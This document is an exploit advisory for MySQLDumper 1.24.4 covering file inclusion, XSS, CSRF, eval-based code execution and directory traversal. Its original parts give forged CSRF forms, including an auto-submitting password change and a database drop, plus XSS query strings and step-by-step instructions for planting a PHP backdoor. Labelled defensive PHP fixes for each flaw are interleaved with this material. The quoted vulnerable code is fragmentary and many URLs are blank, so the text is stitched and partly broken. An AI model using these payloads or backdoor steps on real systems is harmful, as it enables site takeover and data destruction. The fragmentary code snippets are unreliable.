
MySQLDumper 1.24.4 LFI / XSS / CSRF / Code Execution / Traversal

Posted Apr 27, 2012
Authored by Akastep

MySQLDumper version 1.24.4 suffers from code execution, cross site request forgery, cross site scripting, local file inclusion, and directory traversal vulnerabilities.

tags | exploit, local, vulnerability, code execution, xss, file inclusion, csrf
MD5 | 568b012ba56a46dd489f0b6d555183ff

Vulnerable Software: MySQLDumper Version 1.24.4
Downloaded from: http://sourceforge.net/projects/mysqldumper/files/
(MD5 SUM: b62357a0d5bbb43779d16427c30966a1 *MySQLDumper1.24.4.zip)
About the software:
What is MySQLDumper?
MySQLDumper is a PHP and Perl based tool for backing up MySQL databases.
You can easily dump your data into a backup file and - if needed - restore it.
It is especially suited for shared hosting webspaces, where you don't have shell access.
MySQLDumper is an open source project and released under the GNU license.
Safe mode off
OS: Windows XP SP2 (32 bit)
PHP Version:
MYSQL: 5.5.23

Vuln Desc:
MySQLDumper Version 1.24.4 is prone to:
LFI, XSS, CSRF, PHP code execution, directory traversal and information disclosure vulnerabilities.

Local File Inclusion
/* Vulnerable code section */

if (!@ob_start("ob_gzhandler")) @ob_start();
foreach ($_GET as $getvar=>$getval)
foreach ($_POST as $postvar=>$postval)
include_once ( './inc/functions.php' );
include_once ( './inc/mysql.php' );
include_once ( './inc/runtime.php' );
if (!isset($language)) $language="en";   // default only applies when the request loops above did not already set $language

include ( './language/lang_list.php' );
include ( 'language/' . $language . '/lang_install.php' );   // request-controlled $language flows into include() unchecked
include ( 'language/' . $language . '/lang_main.php' );
include ( 'language/' . $language . '/lang_config_overview.php' );

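The following is an added example of the corrected pattern, written for this page and not taken from the advisory or from MySQLDumper. The language code is read explicitly from the request instead of being materialised as a local variable, and it must match one of the directories that actually exist under language/ before anything is included. The layout (language/<code>/lang_*.php) is the one the snippet above shows; LANGUAGE_DIR and the function names are this example's own.

```php
<?php
// Added example, not MySQLDumper code. Assumes the layout visible above:
// language/<code>/lang_install.php, lang_main.php, lang_config_overview.php
declare(strict_types=1);

const LANGUAGE_DIR = __DIR__ . '/language';

/**
 * Build the allowlist from the file system: every subdirectory of
 * LANGUAGE_DIR is a language code. "." and ".." are skipped, so a
 * traversal string can never be a member of this list.
 */
function available_languages(): array
{
    $entries = scandir(LANGUAGE_DIR);
    if ($entries === false) {
        return [];
    }
    $languages = [];
    foreach ($entries as $entry) {
        if ($entry[0] !== '.' && is_dir(LANGUAGE_DIR . '/' . $entry)) {
            $languages[] = $entry;
        }
    }
    return $languages;
}

/**
 * Pick the language for this request. The request value is only ever
 * compared (strictly, so "en\0.." or "en " do not match "en") against
 * the allowlist; it is never concatenated into a path on its own.
 */
function select_language(array $request, string $default = 'en'): string
{
    $allowed   = available_languages();
    $candidate = $request['language'] ?? $default;
    if (is_string($candidate) && in_array($candidate, $allowed, true)) {
        return $candidate;
    }
    return in_array($default, $allowed, true) ? $default : '';
}

function load_language_files(string $language): void
{
    if ($language === '') {
        throw new RuntimeException('no usable language pack found');
    }
    foreach (['lang_install.php', 'lang_main.php', 'lang_config_overview.php'] as $file) {
        $path = LANGUAGE_DIR . '/' . $language . '/' . $file;
        if (!is_file($path)) {
            throw new RuntimeException("missing language file: $language/$file");
        }
        include $path;
    }
}

// Contrast with the vulnerable snippet: $_GET and $_POST are never expanded
// into local variables, so nothing but select_language() decides the path.
load_language_files(select_language($_GET));
```

The allowlist is derived from the directory listing rather than from a regular expression so that adding a language pack needs no code change, and so that the accepted set is exactly the set of packs that exist.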

XSS on inputs via $_POST:
/* Vulnerable code section */
if (!@ob_start("ob_gzhandler")) @ob_start();
include ('./inc/functions.php');
$page=(isset($_GET['page'])) ? $_GET['page'] : 'main.php';   // request-controlled, never validated
if (!file_exists("./work/config/mysqldumper.php"))
header("location: install.php");
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="Author" content="Daniel Schlichtholz">

<frameset border=0 cols="190,*">
<frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize
frameborder="0" marginwidth="0" marginheight="0">
<frame name="MySQL_Dumper_content" src="<?php
echo $page; // <= here: $page is written into the src attribute unencoded
?>" scrolling="auto" frameborder="0" marginwidth="0" marginheight="0">
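As an added example (not part of the advisory and not MySQLDumper's own code), here is the frameset written so that the content frame can only load a page from a fixed list, and so that whatever is written into the src attribute is entity-encoded. main.php and config_overview.php are names that appear in the advisory; the rest of the list, CONTENT_PAGES and h() are this example's own. Encoding alone would not be enough here: a frame src is a URL context, so a javascript: value would still execute even when it is attribute-safe, which is why the allowlist does the deciding.

```php
<?php
// Added example, not MySQLDumper code. main.php and config_overview.php
// are names that appear in the advisory; extend the list with the
// application's other real content pages.
declare(strict_types=1);

const CONTENT_PAGES = ['main.php', 'config_overview.php'];

/**
 * Decide which page the content frame loads. Anything not in the fixed
 * list falls back to main.php, so neither a javascript: URL, an external
 * site, nor an attribute-breaking string reaches the frame's src.
 */
function content_page(array $get): string
{
    $requested = $get['page'] ?? 'main.php';
    if (is_string($requested) && in_array($requested, CONTENT_PAGES, true)) {
        return $requested;
    }
    return 'main.php';
}

/** Encode for an HTML attribute or text node: &, <, >, " and ' all become entities. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$page = content_page($_GET);
?>
<frameset border="0" cols="190,*">
  <frame name="MySQL_Dumper_menu" src="menu.php" scrolling="no" noresize
         frameborder="0" marginwidth="0" marginheight="0">
  <!-- allowlisted AND encoded: the allowlist decides what loads, h() is the
       general rule for every untrusted value written into the page -->
  <frame name="MySQL_Dumper_content" src="<?php echo h($page); ?>"
         scrolling="auto" frameborder="0" marginwidth="0" marginheight="0">
</frameset>
```

The same h() is what the SQL result display needs on every cell, which is the case the advisory shows later with select '<script>alert(1);</script>'. Encoding at output time, rather than filtering input, covers both the $_GET and the $_POST variants with one rule.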


XSS via $_GET;%3C/script%3E&language=en&submit=Installation;%3C/script%3E;%3C/script%3E&tablename=1;%3C/script%3E

CSRF Delete application protection via $_GET
<img src="" />

*After this, the application is left completely unprotected from the outside world.*

CSRF Drop database:

<img src="http://localhost/tld/meonyourpc.PNG" height="250" width="300" />
<form name="hackit" id="hackit" action="" method="post">
<p><blink>Hotlink Protection is Active! Please click refresh button.</blink></p>
<input name="kill1" value="Refresh" onclick="alert('Congrats!) Your Database Dropped!')" type="submit">

kill0 is always information_schema (which obviously cannot be dropped).
Increment that index instead,
e.g.:
kill1 etc.

CSRF: uninstall the application via $_GET
or (this deletes the existing config.php file)

CSRF change password:

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="">
<input name="username" id="username" type="text" value="pwnyou" />
<input name="userpass1" id="userpass1" type="text" value="pwnyou" />
<input name="userpass2" id="userpass2" type="text" value="pwnyou" />
<!--SHA1 (all Systems) -->
<input type="radio" name="type" id="type2" value="2" checked="checked" >


CSRF: execute SQL commands via $_GET
e.g. (create a denial-of-service condition):
<img src=",md5%28now%28%29%29%29--" height="0" width="0" />
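Every CSRF item above (delete protection, drop database, uninstall, change password, execute SQL) has the same root cause: a state-changing request is accepted with nothing but the session cookie to authorise it, and several of them are accepted on a plain GET. The following is an added example, written for this page and not taken from MySQLDumper, of the synchronizer-token fix applied to the password-change handler. The field names username, userpass1 and userpass2 are the ones in the advisory's forged form; csrf_token and the function names are this example's own.

```php
<?php
// Added example, not MySQLDumper code. Field names (username, userpass1,
// userpass2) are the ones in the advisory's forged form; csrf_token and the
// function names are this example's own.
declare(strict_types=1);

// Defence in depth: a Lax SameSite cookie is not sent with a cross-site POST
// from a foreign page, so the forged forms above arrive without a session
// (PHP >= 7.3 accepts the array form of session_set_cookie_params).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

/** One random token per session, stored server-side only. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to render inside every form that changes state. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * A request may change state only if it is a POST and carries the session's
 * token. GET is refused outright, which closes the link-based items above
 * (delete protection, uninstall, execute SQL); the token closes the forged
 * POST forms (drop database, change password). hash_equals() keeps the
 * comparison constant-time.
 */
function csrf_valid(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

/**
 * Password-change handler. Returns the credential to store, or an error,
 * so persistence (not shown here) stays separate from the checks.
 */
function handle_password_change(string $method, array $post, array $session): array
{
    if (!csrf_valid($method, $post, $session)) {
        return ['ok' => false, 'error' => 'missing or stale CSRF token'];
    }
    $user  = $post['username'] ?? '';
    $pass1 = $post['userpass1'] ?? '';
    $pass2 = $post['userpass2'] ?? '';
    if (!is_string($user) || !is_string($pass1) || $user === '' || $pass1 === '' || $pass1 !== $pass2) {
        return ['ok' => false, 'error' => 'invalid input'];
    }
    // store a password_hash() digest rather than the SHA-1 the original form selects
    return ['ok' => true, 'username' => $user, 'hash' => password_hash($pass1, PASSWORD_DEFAULT)];
}

$result = handle_password_change($_SERVER['REQUEST_METHOD'] ?? 'GET', $_POST, $_SESSION);
if (!$result['ok']) {
    http_response_code(403);
}
echo $result['ok'] ? 'password updated' : htmlspecialchars($result['error'], ENT_QUOTES, 'UTF-8');
```

The checks take the method, the POST array and the session as parameters rather than reading the superglobals inside, so the handler can be exercised in a unit test with a forged request (no token, wrong token, GET) and a legitimate one.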

After gaining access to the application (e.g. after successfully exploiting the CSRF that deletes the protection),
a remote attacker can use the following technique to upload a backdoor.
As a result, the site is completely compromised.
*Upload backdoor:*
Rename your backdoor on your PC to me.php.gz
Then switch to:
Upload it:
Then switch to:
In the input box called File:
enter the relative/absolute path to your uploaded me.php.gz (default ./work/backup/me.php.gz)
Click the RELOAD button.
In the input box called File: change the file extension to:
Click the Save button and voilà, you have your own backdoor there.
You can find it:

The same technique can be used without uploading any file:
To do so:
Switch to

Enter a non-existent file name in the input called File:
e.g.:
Click the Reload button.
It will ask *Create it?*
Click the *Create* button.
Copy and paste your backdoor content into the textarea and click the Save button.

The same technique can be used to add a custom .htaccess handler (to execute the backdoor e.g. as a *.gif file).

*NOTE* The second technique can also be used by an attacker to overwrite existing files or read arbitrary files on the site/server.

There is also a chance to execute our code through the PHP eval language *construct*.
We have PHP code execution here:

Vulnerable code section:
if (isset($_POST['selected_config'])||isset($_GET['config']))
    if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
    // Configuration was switched in content frame?
    if (isset($_GET['config'])) $new_config=$_GET['config'];   // request-controlled; used in the path below before read_config()'s blacklist ever sees it
    // restore the last active menuitem
    if (is_readable($config['paths']['config'].$new_config.'.php'))
        if (read_config($new_config))
            $_SESSION['config_file']=$new_config; //$config['config_file'];
<script language="JavaScript" type="text/javascript">
if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
    var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
else selected_div=\'\';
if (isset($_GET['config'])) $config_refresh=''; // prevent a re-invocation when the value is passed from the content area

As you can see, we can traverse it +

If we look at the read_config() function:

function read_config($file=false)
    global $config,$databases;
    if (!$file) $file=$config['config_file'];
    // protect from including external files
    $search=array(':', 'http', 'ftp', ' ');      // blacklist: "../" is not on it
    $replace=array('', '', '', '');

    if (is_readable($config['paths']['config'].$file.'.php'))
        // to prevent modern server from caching the new configuration we need to evaluate it this way
    return $ret;

This means a remote attacker can have their own code evaluated as PHP (notice the eval($f)).

Our exploit:
where ss = ss.php
# cat ss.php   # e.g. a file the attacker uploaded:
echo 'Our command executed ' . getcwd();
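The blacklist in read_config() strips ':', 'http', 'ftp' and spaces, none of which a relative traversal needs, so '../../work/backup/ss' survives it unchanged and the caller's '.php' suffix is then appended to an attacker-chosen path. The following is an added example, written for this page and not taken from MySQLDumper, that reproduces the blacklist next to an allowlist replacement and runs both over a few constructed inputs. CONFIG_DIR stands in for $config['paths']['config'] from the snippet above; all function names are this example's own.

```php
<?php
// Added example, not MySQLDumper code. CONFIG_DIR stands in for
// $config['paths']['config'] from the snippet above; the input strings are
// constructed for the demonstration.
declare(strict_types=1);

const CONFIG_DIR = __DIR__ . '/work/config';

/** The blacklist from read_config(), reproduced to show what it lets through. */
function legacy_sanitize(string $name): string
{
    return str_replace([':', 'http', 'ftp', ' '], '', $name);
}

/**
 * Allowlist replacement: a configuration name is a bare identifier.
 * Without separators or dots there is nothing to traverse with, and the
 * ".php" suffix the caller appends can no longer be pointed at an uploaded
 * file such as the advisory's ss.php.
 */
function valid_config_name(string $name): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) === 1;
}

/**
 * Load a named configuration. The file is PHP that the application wrote
 * itself, so it is included directly; the tag-stripping and eval($f) step
 * only adds another place where a traversed path gets executed.
 */
function read_config_safe(string $name): ?array
{
    if (!valid_config_name($name)) {
        return null;
    }
    $path = CONFIG_DIR . '/' . $name . '.php';
    if (!is_file($path)) {
        return null;
    }
    $config = [];
    include $path;          // populates $config[...] the way the stored file does
    return $config;
}

/** Side by side: what the blacklist leaves of an input vs. whether the allowlist accepts it. */
function compare_filters(array $inputs): array
{
    $rows = [];
    foreach ($inputs as $input) {
        $rows[] = [
            'input'             => $input,
            'after_blacklist'   => legacy_sanitize($input),
            'allowlist_accepts' => valid_config_name($input),
        ];
    }
    return $rows;
}

// Constructed inputs: a normal name, a traversal towards the upload directory
// (the advisory's ss.php case), a URL, and a name with an embedded NUL byte.
$inputs = ['mysqldumper', '../../work/backup/ss', 'http://evil.example/ss', "mysqldumper\0"];
foreach (compare_filters($inputs) as $row) {
    printf("%-28s blacklist -> %-24s allowlist -> %s\n",
        addcslashes($row['input'], "\0"),
        addcslashes($row['after_blacklist'], "\0"),
        $row['allowlist_accepts'] ? 'accept' : 'reject');
}
```

Run from the command line, the table shows the traversal string passing the blacklist untouched while only the plain identifier passes the allowlist. Note that the advisory's snippet also calls is_readable() on the raw $new_config before read_config() runs, so even a complete blacklist there would have been checked too late; validating the name once, at the point it enters, removes that ordering problem.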

Print screen:

There are also a lot of cross-site scripting (XSS) vulnerabilities:
Switch to:

select '<script>alert(1);</script>'

and click Execute SQL Statement.

/* Vulnerable code section */
if (isset($_GET['action'])&&$_GET['action']=='dl') $download=true;
include ('./inc/header.php');
include_once ('./language/'.$config['language'].'/lang.php');
include_once ('./language/'.$config['language'].'/lang_filemanagement.php');
include_once ('./language/'.$config['language'].'/lang_config_overview.php');
include_once ('./language/'.$config['language'].'/lang_main.php');
include_once ('./inc/functions_files.php');
include_once ('./inc/functions_sql.php');
if ($config['auto_delete']==1) $msg=AutoDelete();
get_sql_encodings(); // get possible sql charsets and also get default charset
// 0=database 1=structure
$action=(isset($_GET['action'])) ? $_GET['action'] : 'files';
$kind=(isset($_GET['kind'])) ? $_GET['kind'] : 0;
$expand=(isset($_GET['expand'])) ? $_GET['expand'] : -1;
$selectfile=(isset($_POST['selectfile'])) ? $_POST['selectfile'] : "";
$destfile=(isset($_POST['destfile'])) ? $_POST['destfile'] : "";
$compressed=(isset($_POST['compressed'])) ? $_POST['compressed'] : "";
$dk=(isset($_POST['dumpKommentar'])) ? ((get_magic_quotes_gpc()) ? stripslashes($_POST['dumpKommentar']) : $_POST['dumpKommentar']) : "";
$dk=str_replace(':','|',$dk); // remove : because of statusline
$dump['sel_dump_encoding']=(isset($_POST['sel_dump_encoding'])) ? $_POST['sel_dump_encoding'] : get_index($config['mysql_possible_character_sets'],$config['mysql_standard_character_set']);
$dump['dump_encoding']=isset($config['mysql_possible_character_sets'][$dump['sel_dump_encoding']]) ? $config['mysql_possible_character_sets'][$dump['sel_dump_encoding']] : 0;

if ($action=='dl')
    // Download of a backup file wanted
    if (is_readable($file))   // readability is the only check; nothing ties $file to the backup directory
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename='.basename($file));
        header('Content-Transfer-Encoding: binary');
        header('Expires: 0');
        header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
        header('Pragma: public');
        header('Content-Length: '.(string) filesize($file));
        while (!feof($file))
            print fread($file,round(100*1024));



This technique can be used by an attacker to download arbitrary files from the site/server.
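The download branch above checks only that the requested path is readable, never that it lies inside the backup directory. The following is an added example, written for this page and not taken from MySQLDumper, of a download handler that resolves the request to a canonical path and refuses anything outside ./work/backup/ (the default location the advisory names). The request parameter name f is an assumption, since the original URL is not reproduced on the page; BACKUP_DIR and the function names are this example's own. The same containment step is what the file editor described earlier (the File: box that accepts a relative or absolute path) would need before reading or writing.

```php
<?php
// Added example, not MySQLDumper code. BACKUP_DIR is the ./work/backup/
// directory the advisory names; the request parameter name "f" is assumed,
// as the original URL is not reproduced on the page.
declare(strict_types=1);

const BACKUP_DIR = __DIR__ . '/work/backup';

/**
 * Map a requested backup file name to a canonical path inside BACKUP_DIR,
 * or return null. Three independent checks: the name must be a bare file
 * name, it must carry a backup extension, and the realpath() result
 * (symlinks resolved) must still lie under the backup directory.
 */
function resolve_backup_file(string $requested): ?string
{
    if ($requested === '' || strpos($requested, "\0") !== false || $requested !== basename($requested)) {
        return null;
    }
    if (preg_match('/\.(sql|gz)\z/', $requested) !== 1) {
        return null;
    }
    $root = realpath(BACKUP_DIR);
    $path = realpath(BACKUP_DIR . '/' . $requested);
    if ($root === false || $path === false || !is_file($path)) {
        return null;
    }
    // containment: prefix match on the canonical directory plus separator,
    // so "/work/backup" does not also admit "/work/backup_old/..."
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Send a contained backup file, or a 404 when the request does not resolve. */
function send_backup(string $requested): bool
{
    $path = resolve_backup_file($requested);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);   // streams the file; no manual feof()/fread() loop needed
    return true;
}

if (($_GET['action'] ?? '') === 'dl') {
    send_backup((string) ($_GET['f'] ?? ''));
}
```

The basename() comparison rejects any name containing a separator before the file system is consulted at all; the realpath() comparison is what catches a symlink planted inside the backup directory that points elsewhere, which the first check alone cannot see.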
Print screen:

Information Disclosure:
Try to access this file directly:
Generates a lot of notices.
Generates a lot of notices.
Fatal error: Call to undefined function MSD_mysql_connect() in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\cubemail\inc\functions.php on line 147

NOTE: Previous versions may also be affected, but this was not tested.

================================ EOF ======================================

+++++++Greetz to all++++++++++
securtiyvulns.com and
to all AA Team.
Thank you.

/AkaStep ^_^
Live 1335567729

